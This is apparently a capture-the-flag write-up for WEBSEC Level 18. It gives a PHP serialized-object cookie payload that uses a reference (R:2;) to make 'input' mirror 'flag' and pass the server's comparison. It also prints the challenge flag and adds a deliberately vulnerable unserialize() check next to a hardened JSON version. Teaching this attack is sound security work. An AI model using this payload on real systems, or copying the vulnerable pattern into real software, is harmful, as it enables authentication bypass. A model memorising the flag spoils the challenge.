WEBSEC Level 18
Challenge description
Can you please give it back? Thanks.
Walk through
STEP 1: Payload to point $obj->input to the reference of $obj->flag, which in turn points to $flag

    // Start from an empty object whose flag property is null
    $obj = new stdClass;
    $obj->flag = null;
    // Make input a reference to flag, then print the serialized form
    $obj->input = &$obj->flag;
    echo serialize($obj);

OUTPUT: O:8:"stdClass":2:{s:4:"flag";N;s:5:"input";R:2;}

STEP 2: URL-encode the output

OUTPUT: O%3A8%3A%22stdClass%22%3A2%3A%7Bs%3A4%3A%22flag%22%3BN%3Bs%3A5%3A%22input%22%3BR%3A2%3B%7D

STEP 3: Insert the output as the obj cookie value

OUTPUT: Here is your flag: WEBSEC{You_have_impressive_refrences._We'll_call_you_back.}.
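Why the R:2; token in the STEP 1 payload matters, as an added example that is not part of the original write-up or the challenge's code: check_unserialize() is an assumed stand-in for the server-side check (the page does not show it), $secret is a constructed placeholder, and check_json() is one way to read the same cookie without PHP references.

```php
<?php
// Added illustration. check_unserialize() is an ASSUMED stand-in for the
// server-side check; the write-up does not show the challenge source.

// Payload from STEP 1. "R:2;" is a PHP reference to value slot 2 of the
// stream: slot 1 is the object itself, slot 2 is the "flag" property.
$cookie = 'O:8:"stdClass":2:{s:4:"flag";N;s:5:"input";R:2;}';
$secret = 'PLACEHOLDER_SECRET'; // constructed value, not the real flag

// Weak pattern: decode attacker data with unserialize(), then store a
// secret in the decoded object and compare it to another property.
function check_unserialize(string $cookie, string $secret): bool
{
    $obj = unserialize($cookie);
    if (!($obj instanceof stdClass)) {
        return false;
    }
    // "input" aliases "flag", so this write is visible through both names.
    $obj->flag = $secret;
    $input = $obj->input ?? null;
    return is_string($input) && hash_equals($obj->flag, $input);
}

// Hardened pattern: JSON has no reference syntax, and the secret is never
// written into a structure built from attacker input.
function check_json(string $cookie, string $secret): bool
{
    $data = json_decode($cookie, true);
    if (!is_array($data) || !is_string($data['input'] ?? null)) {
        return false;
    }
    return hash_equals($secret, $data['input']);
}

var_dump(check_unserialize($cookie, $secret));
var_dump(check_json($cookie, $secret));
var_dump(check_json('{"input":"guess"}', $secret));
```

Run from the PHP command line: the unserialize() check reports a match although the cookie never contained the secret, while the JSON check rejects both the serialized payload and a wrong guess.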
Flag
FLAG: WEBSEC{You_have_impressive_refrences._We'll_call_you_back.}
For further queries, please DM me on Twitter: https://twitter.com/gopika-subramanian.